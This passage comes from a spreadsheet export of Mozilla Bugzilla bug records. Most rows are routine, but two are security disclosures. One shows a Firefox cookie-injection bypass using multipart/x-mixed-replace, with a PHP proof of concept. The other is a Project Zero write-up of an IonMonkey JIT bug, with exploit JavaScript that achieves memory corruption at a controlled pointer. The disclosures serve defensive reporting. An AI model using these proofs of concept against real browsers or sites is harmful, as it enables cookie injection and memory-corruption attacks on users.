0012f158 02bf0595 gklayout!nsEventDispatcher::Dispatch+0x51e
0012f1e0 03a1788c gklayout!DocumentViewerImpl::LoadComplete+0x1c5
0012f21c 039fa127 docshell!nsDocShell::EndPageLoad+0x8c
0012f5f0 03a1752a docshell!nsWebShell::EndPageLoad+0x127
0012f640 03a41149 docshell!nsDocShell::OnStateChange+0x2ea
0012f6ec 03a402eb docshell!nsDocLoader::FireOnStateChange+0x1f9
quit:</t>
        </is>
      </c>
      <c r="X6131" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6132">
      <c r="A6132" t="n">
        <v>1864385</v>
      </c>
      <c r="B6132" t="inlineStr">
        <is>
          <t>2023-11-13 00:54:57 -0800</t>
        </is>
      </c>
      <c r="C6132" t="inlineStr">
        <is>
          <t>Content-Type: multipart/x-mixed-replace allows Set-Cookie in response parts</t>
        </is>
      </c>
      <c r="D6132" t="inlineStr">
        <is>
          <t>2024-09-16 00:17:08 -0700</t>
        </is>
      </c>
      <c r="E6132" t="n">
        <v>1</v>
      </c>
      <c r="F6132" t="n">
        <v>1</v>
      </c>
      <c r="G6132" t="n">
        <v>3</v>
      </c>
      <c r="H6132" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6132" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6132" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K6132" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6132" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6132" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6132" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6132" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6132" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][necko-triaged][necko-priority-queue][adv-main123+][adv-esr115.8+]</t>
        </is>
      </c>
      <c r="Q6132" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6132" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S6132" t="inlineStr">
        <is>
          <t>123 Branch</t>
        </is>
      </c>
      <c r="T6132" t="n">
        <v>1</v>
      </c>
      <c r="U6132" t="n">
        <v>0</v>
      </c>
      <c r="V6132" t="n">
        <v>28</v>
      </c>
      <c r="W6132" t="inlineStr">
        <is>
          <t>## Summary
When Firefox encounters a response with the Content-Type of multipart/x-mixed-replace it will parse the response and update the document based on what is returned inside a given `--BOUNDARY`. Each response block
```
--BOUNDARY
Content-Type: text/html
data
```
It is allowed to set its own `Content-Type`.
I stumbled upon this Tweet https://x.com/ankursundara/status/1723410507389129092 where someone described an odd behavior in Firefox. The tweet mentions that you can also add `Content-Security-Policy` to each block, and this policy will be mixed in with the original policy given for the main response (this has some issues of its own but could be argued to work as expected).
I decided to test if any other headers could be altered inside these blocks. I found that contrary to Safari (Chrome handles x-mixed-replace differently), Firefox allows for `Set-Cookie` headers to be added inside each block, and they will get added to the current domain.
## Issue
Any user that can set the `Content-Type` and control the response body of the request will be able to also set cookies on the domain.
I have found two examples of where this is an issue (just to prove the point):
1. Grafana (the monitoring platform) has a "proxy endpoint" where users can access requests to other services and have the response presented under grafana.example.com. To make this "safe" Grafana is stripping any `Set-Cookie` headers from the response, and also set a "Content-Security-Policy: sandbox" on the response. This makes the feature safe to use in most browsers. Using the `Content-Type: multipart/x-mixed-replace` and `Set-Cookie` trick here will allow to bypass this protection in Firefox.
2. The site https://webhook.site is a testing tool for webhooks. You can create a custom webhook like https://webhook.site/RANDOM where they allow you to configure the `Content-Type` and the response body of the response from your webhook test site. Even if you are only allowed to control the `Content-Type` and the body you can use the issue here to bypass this and inject `Set-Cookie` headers.
I tried to set some additional headers like Alt-Svc in the subparts but this did not work. The ones I got working in each sub block was
Content-Type
Content-Disposition
Content-Security-Policy
Set-Cookie
## POC
I used a simple PHP site like this
```
&lt;?php
header("Content-Type: multipart/x-mixed-replace; boundary=TEST");
?&gt;
--TEST
Set-Cookie: testcookie=testvalue
&lt;h1&gt;Test&lt;/h1&gt;
--TEST--
```
Then visit the site and see the &lt;h1&gt; render. Now look at the request in dev tools. You will see that the original request does not include any Set-Cookie header, but looking at the Storage tab, you can see the cookie has been set.
(this is my POC page https://joaxcar.com/firefox/cookie.php)
/Johan</t>
        </is>
      </c>
      <c r="X6132" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6133">
      <c r="A6133" t="n">
        <v>1270460</v>
      </c>
      <c r="B6133" t="inlineStr">
        <is>
          <t>2016-05-05 05:04:12 -0700</t>
        </is>
      </c>
      <c r="C6133" t="inlineStr">
        <is>
          <t>Configure New Relic for the new Heroku stage/prod instances</t>
        </is>
      </c>
      <c r="D6133" t="inlineStr">
        <is>
          <t>2016-05-05 05:58:35 -0700</t>
        </is>
      </c>
      <c r="E6133" t="n">
        <v>1</v>
      </c>
      <c r="F6133" t="n">
        <v>1</v>
      </c>
      <c r="G6133" t="n">
        <v>7</v>
      </c>
      <c r="H6133" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6133" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6133" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K6133" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6133" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6133" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6133" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6133" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6133" t="inlineStr"/>
      <c r="Q6133" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6133" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6133" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6133" t="n">
        <v>1</v>
      </c>
      <c r="U6133" t="n">
        <v>0</v>
      </c>
      <c r="V6133" t="n">
        <v>2</v>
      </c>
      <c r="W6133" t="inlineStr">
        <is>
          <t>The following will need to be set up via the web UI:
* Application configuration
* Alert policy groups
* Alerts for plugins
The apps can't be added/configured until the Python agent first reports (deploys don't create a new app).</t>
        </is>
      </c>
      <c r="X6133" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6134">
      <c r="A6134" t="n">
        <v>500843</v>
      </c>
      <c r="B6134" t="inlineStr">
        <is>
          <t>2009-06-26 17:09:16 -0700</t>
        </is>
      </c>
      <c r="C6134" t="inlineStr">
        <is>
          <t>de translation of Mozilla Service Week</t>
        </is>
      </c>
      <c r="D6134" t="inlineStr">
        <is>
          <t>2011-01-10 00:53:03 -0800</t>
        </is>
      </c>
      <c r="E6134" t="n">
        <v>1</v>
      </c>
      <c r="F6134" t="n">
        <v>1</v>
      </c>
      <c r="G6134" t="n">
        <v>6</v>
      </c>
      <c r="H6134" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6134" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J6134" t="inlineStr">
        <is>
          <t>mozillaservice.org</t>
        </is>
      </c>
      <c r="K6134" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6134" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6134" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6134" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6134" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6134" t="inlineStr">
        <is>
          <t>L10n</t>
        </is>
      </c>
      <c r="Q6134" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6134" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6134" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="T6134" t="n">
        <v>1</v>
      </c>
      <c r="U6134" t="n">
        <v>0</v>
      </c>
      <c r="V6134" t="n">
        <v>153</v>
      </c>
      <c r="W6134" t="inlineStr">
        <is>
          <t>po and faq.php files have been created for the German translation.
http://viewvc.svn.mozilla.org/vc/projects/mozillaservice.org/trunk/web/application/locale/de/</t>
        </is>
      </c>
      <c r="X6134" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6135">
      <c r="A6135" t="n">
        <v>289002</v>
      </c>
      <c r="B6135" t="inlineStr">
        <is>
          <t>2005-04-04 13:09:34 -0700</t>
        </is>
      </c>
      <c r="C6135" t="inlineStr">
        <is>
          <t>cannot set/clear requests with requestee</t>
        </is>
      </c>
      <c r="D6135" t="inlineStr">
        <is>
          <t>2005-04-09 14:04:51 -0700</t>
        </is>
      </c>
      <c r="E6135" t="n">
        <v>1</v>
      </c>
      <c r="F6135" t="n">
        <v>1</v>
      </c>
      <c r="G6135" t="n">
        <v>4</v>
      </c>
      <c r="H6135" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6135" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6135" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K6135" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L6135" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6135" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6135" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6135" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6135" t="inlineStr"/>
      <c r="Q6135" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6135" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6135" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T6135" t="n">
        <v>1</v>
      </c>
      <c r="U6135" t="n">
        <v>0</v>
      </c>
      <c r="V6135" t="n">
        <v>8</v>
      </c>
      <c r="W6135" t="inlineStr">
        <is>
          <t>when I try to clear requests (some having a requestee), I get the following error:
URL: http://localhost/cvsbugzilla/process_bug.cgi
undef error - Can't use string ("") as an ARRAY ref while "strict refs" in use
at Bugzilla/User.pm line 1021.</t>
        </is>
      </c>
      <c r="X6135" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6136">
      <c r="A6136" t="n">
        <v>1532599</v>
      </c>
      <c r="B6136" t="inlineStr">
        <is>
          <t>2019-03-05 04:08:21 -0800</t>
        </is>
      </c>
      <c r="C6136" t="inlineStr">
        <is>
          <t>Spidermonkey: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script</t>
        </is>
      </c>
      <c r="D6136" t="inlineStr">
        <is>
          <t>2022-10-31 05:42:27 -0700</t>
        </is>
      </c>
      <c r="E6136" t="n">
        <v>1</v>
      </c>
      <c r="F6136" t="n">
        <v>1</v>
      </c>
      <c r="G6136" t="n">
        <v>3</v>
      </c>
      <c r="H6136" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6136" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6136" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K6136" t="inlineStr">
        <is>
          <t>65 Branch</t>
        </is>
      </c>
      <c r="L6136" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6136" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6136" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6136" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6136" t="inlineStr">
        <is>
          <t>[adv-main66+][adv-esr60.6+]</t>
        </is>
      </c>
      <c r="Q6136" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6136" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6136" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T6136" t="n">
        <v>1</v>
      </c>
      <c r="U6136" t="n">
        <v>0</v>
      </c>
      <c r="V6136" t="n">
        <v>40</v>
      </c>
      <c r="W6136" t="inlineStr">
        <is>
          <t>IonMonkey can, during a bailout, leak an internal JS_OPTIMIZED_OUT magic value to the running script. This magic value can then be used to achieve memory corruption.
# Prerequisites
## Magic Values
Spidermonkey represents JavaScript values with the C++ type [JS::Value](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/public/Value.h#L276), which is a NaN-boxed value that can encode a variety of different [types](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/public/Value.h#L53) such as doubles, string pointers, integers, or object pointers. Besides the types available in JavaScript, JS::Value can also store [special ("magic")](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/public/Value.h#L191) values for various internal purposes. For example, JS_ELEMENTS_HOLE is used to represent holes in arrays, and JS_OPTIMIZED_ARGUMENTS represents the `arguments` object during a function call (so that no actual memory allocation is required for it).
## Branch Pruning
IonMonkey (Spidermonkey's JIT engine) represents JavaScript code as a control-flow graph (CFG) of MIR (mid-level IR) instructions. When starting to compile a function, IonMonkey first translates the bytecode to MIR, keeping the same CFG. Afterwards, it tries to remove subtrees in the CFG that appear to not be used in order to save compilation time and potentially improve the result of various optimizations performed later. As an example, consider the following code, and assume further that in all previous executions only the if branch had been taken:
    if (cond_that_has_always_been_true) {
        // do something
    } else {
        // do something else
    }
In this case, branch pruning would likely decide to discard the else branch entirely and instead replace it with a bailout instruction to bailout to the baseline JIT should the branch ever be taken:
    if (cond_that_has_always_been_true) {
        // do something
    } else {
        bailout();      // will continue execution in baseline JIT
    }
## Phi Elimination
IonMonkey's MIR uses static single assignment (SSA) form. In SSA form, every variable is assigned exactly once. Reassignments of variables on different branches in the CFG are handled with special Phi instructions. Consider the following example:
    var x;
    if (c) {
        x = 1337;
    } else {
        x = 1338;
    }
    print(x);
After translation to SSA form it would look something like this:
    if (c) {
        x1 = 1337;
    } else {
        x2 = 1338;
    }
    x3 = Phi(x1, x2);
    print(x3);
Phi Elimination is an optimization pass that tries to remove Phi instructions that are either redundant or unobservable (which frequently appear as result of SSA conversion and various optimizations). Quoting from the [source code](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L1382):
    // Eliminates redundant or unobservable phis from the graph.  A
    // redundant phi is something like b = phi(a, a) or b = phi(a, b),
    // both of which can be replaced with a.  An unobservable phi is
    // one that whose value is never used in the program.
Unobservalbe Phis are then replaced a special value, [MagicOptimizedOut](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonTypes.h#L447). In case of a bailout from the JIT, such an optimized-out value will be materialized as a [JS_OPTIMIZED_OUT](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/public/Value.h#L223) JS magic value. This should not be observable by script since the compiler was able to prove that the variable is never used. Spidermonkey can, however, not simply leave the slot for an optimized-out variable uninitialized as e.g. the garbage collector expects a valid JS::Value in it.
Phi elimination can lead to problems in combination with branch pruning. Consider the following example:
    var only_used_in_else_branch = ...;
    if (cond_that_has_always_been_true) {
        // do something, but don't use only_used_in_else_branch
    } else {
        // do something else and use only_used_in_else_branch
    }
Here again, branch pruning might decide to remove the else branch, in which case no use of the variable remains. As such, it would be replaced by a magic JS constant (JS_OPTIMIZED_OUT) in the JIT. Later, if the else branch was actually taken, the JIT code would perform a bailout and try to restore the variable. However, as it has been removed, it would now (incorrectly) restore it as JS_OPTIMIZED_OUT magic and continue using it in the baseline JIT, where it could potentially be observed by the executing script. To avoid this, branch pruning marks SSA variables that are used in removed blocks as ["useRemoved"](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/MIR.h#L129), in which case the variables will [not be optimized out](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L1330).
# Bug Description
While fuzzing Spidermonkey, I encountered the following sample which crashes Spidermonkey built from the current release branch:
    function poc() {
        const x = "adsf";
        for (let v7 = 0; v7 &lt; 2; v7++) {
            function v8() {
                let v13 = 0;
                do {
                    v13++;
                } while (v13 &lt; 1200000);
            }
            const v15 = v8();
            for (let v25 = 0; v25 &lt; 100000; v25++) {
                if (x) {
                } else {
                    const v26 = {get:v8};
                    for (let v30 = 0; v30 &lt; 1000; v30++) { }
                }
            }
        }
    }
    poc();
It appears what is happening here is roughly the following:
At the beginning of JIT compilation (somewhere in one of the inner loops), IonMonkey produces the following simplified CFG (annotated with the different SSA variables for `x`):
           +-------+
           |   0   +-----+
           | Entry |     |
           +-------+     |
       x1 = "asdf"       v
                     +-----------+
                     |     1     |
    +---------------&gt;| Loop Head |
    |                +--+--------+
    |                   |  x2 = Phi(x1, x5)
    |                   +--------+
    |                            v
    |   +-----------+     +------------+
    |   |     3     |     |    2...    |
    |   | OSR Entry |     | Inlined v8 |
    |   +-+---------+     +----------+-+
    |     | x3 = osrval('x')         |
    |     +---------+     +----------+
    |               v     v
    |           +-------------+
    |           |      4      |
    |           |    Merge    |
    |           +-----------+-+
    |      x4 = Phi(x3, x2) |
    |                       v
    |           +-------------+
    |           |    5...     |
    +-----------+ Inner Loop  |
                +-------------+
              x5 = Phi(x4, ..); use(x5);
Since the function is already executing in the baseline JIT, the JIT code compiled by IonMonkey will likely be entered via OSR at block 3 in the middle of the outer loop.
After producing the initial MIR code, IonMonkey performs branch pruning. During branch pruning, IonMonkey inspects the hit count of the bytecode (and performs some more heuristics), and decides that block 3 (or really the exit from the loop in v8) should be pruned and replaced with a bailout to the baseline JIT. The CFG then looks something like this:
           +-------+
           |   0   +-----+
           | Entry |     |
           +-------+     |
       x1 = "asdf"       v
                     +-----------+
                     |     1     |
    +---------------&gt;| Loop Head |
    |                +--+--------+
    |                   |  x2 = Phi(x1, x5)
    |                   +--------+
    |                            v
    |   +-----------+     +------------+
    |   |     3     |     |    2...    |
    |   | OSR Entry |     | Inlined v8 |
    |   +-+---------+     +------------+
    |     | x3 = osrval(1)
    |     +---------+        !! branch pruned !!
    |               v
    |           +-------------+
    |           |      4      |
    |           |    Merge    |
    |           +-----------+-+
    |      x4 = Phi(x3)     |
    |                       v
    |           +-------------+
    |           |    5...     |
    +-----------+ Inner Loop  |
                +-------------+
              x5 = Phi(x4, ..); use(x5);
Since there was no use of x2 in the removed code, x2 is not marked as "use removed". However, when removing the branch 2 -&gt; 4, IonMonkey also removed x2 as input to the Phi for x4 as there is no longer a path between block 1 and block 4. This removal of a use without setting the useRemoved flag then leads to problems later on, in particular during Phi Elimination, which changes the code to the following:
           +-------+
           |   0   +-----+
           | Entry |     |
           +-------+     |
       x1 = "asdf"       v
                     +-----------+
                     |     1     |
    +---------------&gt;| Loop Head |
    |                +--+--------+
    |                   |  x2 = OPTIMIZED_OUT
    |                   +--------+
    |                            v
    |   +-----------+     +------------+
    |   |     3     |     |    2...    |
    |   | OSR Entry |     | Inlined v8 |
    |   +-+---------+     +------------+
    |     | x3 = osrval(1)
    |     +---------+        !! branch pruned !!
    |               v
    |           +-------------+
    |           |      4      |
    |           |    Merge    |
    |           +-----------+-+
    |      x4 = Phi(x3)     |
    |                       v
    |           +-------------+
    |           |    5...     |
    +-----------+ Inner Loop  |
                +-------------+
              x5 = Phi(x4, ..); use(x5);
Here, Phi Elimination decided that x2 is an unobservable Phi as it is not used anywhere. As such, it replaces it with a MagicOptimizedOut value. However, when block 2 is executed in the JITed code, it will perform a bailout and restore `x` as JS_OPTIMIZED_OUT magic value. This is incorrect as the interpreter/baseline JIT will use `x` once it reaches the inner loop. There, `x` (now the optimized out magic) is used for a ToBoolean conversion, which crashes (in a non exploitable way) when reaching this code:
    JS_PUBLIC_API bool js::ToBooleanSlow(HandleValue v) {
      ...;
      MOZ_ASSERT(v.isObject());
      return !EmulatesUndefined(&amp;v.toObject());     // toObject will return an invalid pointer for a magic value
    }
A similar scenario is described in [FlagPhiInputsAsHavingRemovedUses](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L146), which is apparently supposed to prevent this from happening by marking x2 as useRemoved during branch pruning. However, in this case, FlagPhiInputsAsHavingRemovedUses fails to mark x2 as useRemoved as it concludes that x4 is also unused: basically, FlagPhiInputsAsHavingRemovedUses invokes [DepthFirstSearchUse](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L41) to figure out whether some Phi is used by performing a depth-first search over all uses. If it finds a non-Phi use, it returns true. In block 5 above (which are really multiple blocks), x4 is used by another Phi, x5, which is then used by a "real" instruction. DepthFirstSearchUse now visits x5 and puts it into the worklist. It then eventually finds x4 and:
* finds x5 as use, but as x5 is already in the worklist it [skips it](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L106)
* finds no other uses, and thus (incorrectly?) [marks x4 as unused](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L135)
As such, x2 is later on not marked as useRemove since its only use (x4) appears to be unused anyways.
# Exploitation
It is possible get a reference to the magic JS_OPTIMIZED_OUT value by changing the body of the inner for loop to something like this:
        for (let v25 = 0; v25 &lt; 100000; v25++) {
            // Should never be taken, but will be after triggering the bug (because both v3 and v1
            // will be a JS_OPTIMIZED_OUT magic value).
            if (v3 === v1) {
                let magic = v3;
                console.log("Magic is happening!");
                // do something with magic
                return;
            }
            if (v1) {
            } else {
                const v26 = {get:v8};
                for (let v30 = 0; v30 &lt; 1000; v30++) { }
            }
        }
Afterwards, the magic value will be stored in a local variable and can be freely used. What remains now is a way to use the magic value to cause further misbehaviour in the engine.
Spidermonkey uses different magic values in various places. These places commonly check for the existence of some specific magic value by calling `.isMagic(expectedMagicType)` on the value in question. For example, to check for the magic hole element, the code would invoke `elem.isMagic(JS_ELEMENTS_HOLE)`. The implementation of `isMagic` is shown below:
    bool isMagic(JSWhyMagic why) const {
      MOZ_ASSERT_IF(isMagic(), s_.payload_.why_ == why);
      return isMagic();
    }
Interestingly, this way of implementing it makes it possible to supply a different magic value than the expected one while still causing this function to return true, thus making the caller believe that it has the right magic value. As such, the JS_OPTIMIZED_OUT magic value can, in many cases, be used as any other magic value in the code.
One interesting use of magic values is JS_OPTIMIZED_ARGUMENTS, representing the `arguments` object. The idea is that e.g.
    function foo() {
        print(arguments[0]);
    }
Gets compiled to bytecode like this:
    push JS_OPTIMIZED_ARGUMENTS
    LoadElem 0
    call print
The special handling for the magic value is then performed here:
    static bool DoGetElemFallback(JSContext* cx, BaselineFrame* frame,
                                  ICGetElem_Fallback* stub, HandleValue lhs,
                                  HandleValue rhs, MutableHandleValue res) {
      // ...
      bool isOptimizedArgs = false;
      if (lhs.isMagic(JS_OPTIMIZED_ARGUMENTS)) {
        // Handle optimized arguments[i] access.
        if (!GetElemOptimizedArguments(cx, frame, &amp;lhsCopy, rhs, res,
                                       &amp;isOptimizedArgs)) {
          return false;
        }
      // ...
Which eventually ends up in:
    inline Value&amp; InterpreterFrame::unaliasedActual(
      unsigned i, MaybeCheckAliasing checkAliasing) {
      MOZ_ASSERT(i &lt; numActualArgs());
      MOZ_ASSERT_IF(checkAliasing, !script()-&gt;argsObjAliasesFormals());
      MOZ_ASSERT_IF(checkAliasing &amp;&amp; i &lt; numFormalArgs(),
                    !script()-&gt;formalIsAliased(i));
      return argv()[i];         // really is just argv_[i];
    }
An [InterpreterFrame](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/vm/Stack.h#L85) is an object representing the invocation context of a JavaScript function.
Basically, there are two types of InterpreterFrames: [CallFrames](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/vm/Stack-inl.h#L51), which are used for regular function calls and thus have the `nactul_` (the number of arguments) and `argv_` (a pointer to the argument values) members initialized, and [ExecuteFrames](https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/vm/Stack.cpp#L35), which are e.g. used for eval()ed code. Interestingly, ExecuteFrames leave `nactual_` and `argv_` uninitialized, which is normally fine as code would never access these fields in an ExecuteFrame. However, by having a reference to a magic value, it now becomes possible to trick the engine into believing that whatever frame is currently active is a CallFrame and thus has a valid `argv_` pointer by loading an element from the magic value (`magic[i]` in JS). Conveniently, InterpreterFrames are allocated by a bump allocator, used solely for the interpreter stack. As such, the allocations are very deterministic and it is easily possible to overlap the uninitialized member with any other data that is stored on the interpreter stack, such as local variables of functions.
The following PoC (tested against a local Spidermonkey build and Firefox 65.0.1) demonstrates this. It will first trigger the bug to leak the magic JS_OPTIMIZED_OUT value. Afterwards, it puts a controlled value (0x414141414141 in binary) on the interpreter stack (in `fill_stack`), then uses the magic value from inside an eval frame of which the `argv_` pointer overlaps with the controlled value. Spidermonkey will then assume that the current frame must be a FunctionFrame and treat the value as an `argv_` pointer, thus crashing at 0x414141414141.
    // This function uses roughly sizeof(InterpreterFrame) + 14 * 8 bytes of interpreter stack memory.
    function fill_stack() {
        // Use lot's of stack slots to increase the allocation size of this InterpreterFrame.
        var v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13;
        // Will overlap with the argv_ pointer in the InterpreterFrame for the call to eval.
        var v14 = 3.54484805889626e-310;
    }
    // This function uses roughly sizeof(InterpreterFrame) bytes of interpreter stack memory. The inner
    // call to eval will get its own InterpreterFrame, which leaves the argv_ pointer uninitialized
    // (since it's an eval frame). However, due to having a magic value here, it is possible to trick
    // the interpreter into accessing argv_ (because it assumes that the magic value represents an
    // `arguments` object). The argv_ pointer of the inner frame will then overlap with one of the
    // variables of the previous function, and is thus fully controllable.
    function trigger(magic) {
        eval(`magic[0]`);
    }
    // Invoke the two functions above to achieve memory corruption given a magic JS::Value.
    function hax(magic) {
        fill_stack();
        trigger(magic);
    }
    function pwn() {
        const v1 = "adsf";
        const v3 = "not_asdf";
        for (let v7 = 0; v7 &lt; 2; v7++) {
            function v8() {
                let v13 = 0;
                do {
                    v13++;
                } while (v13 &lt; 1200000);
                // If the previous loop runs long enough, IonMonkey will JIT compile v8 and enter the
                // JITed code via OSR. This will leave the hitCount for the loop exit in the interpreter
                // at 0 (because the exit is taken in JITed code). This in turn will lead to IonMonkey
                // pruning the loop exit when compiling pwn() (with inlined v8), as its heuristics
                // suggest that the branch is never taken (hitCount == 0 and a few more). This will then
                // lead to the incorrect removal of Phi nodes, and ultimately the leaking of a
                // JS_OPTMIZED_OUT magic value to the baseline JIT, where it is observable for the
                // current script.
            }
            const v15 = v8();
            for (let v25 = 0; v25 &lt; 100000; v25++) {
                // Should never be taken, but will be after triggering the bug (because both v3 and v1
                // will be a JS_OPTIMIZED_OUT magic value).
                if (v3 === v1) {
                    let magic = v3;
                    console.log("Magic is happening!");
                    hax(magic);
                    return;
                }
                if (v1) {
                } else {
                    const v26 = {get:v8};
                    for (let v30 = 0; v30 &lt; 1000; v30++) { }
                }
            }
        }
    }
    pwn();
Please note: this bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
With any fix, please give credit for identifying the vulnerability to Samuel Groß of Google Project Zero.</t>
        </is>
      </c>
      <c r="X6136" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6137">
      <c r="A6137" t="n">
        <v>1056410</v>
      </c>
      <c r="B6137" t="inlineStr">
        <is>
          <t>2014-08-20 16:41:28 -0700</t>
        </is>
      </c>
      <c r="C6137" t="inlineStr">
        <is>
          <t>More missing callgraph edges involving destructors</t>
        </is>
      </c>
      <c r="D6137" t="inlineStr">
        <is>
          <t>2016-07-02 10:39:04 -0700</t>
        </is>
      </c>
      <c r="E6137" t="n">
        <v>1</v>
      </c>
      <c r="F6137" t="n">
        <v>1</v>
      </c>
      <c r="G6137" t="n">
        <v>3</v>
      </c>
      <c r="H6137" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6137" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6137" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K6137" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6137" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6137" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6137" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6137" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6137" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.2+][adv-main39+][adv-esr38.1+]</t>
        </is>
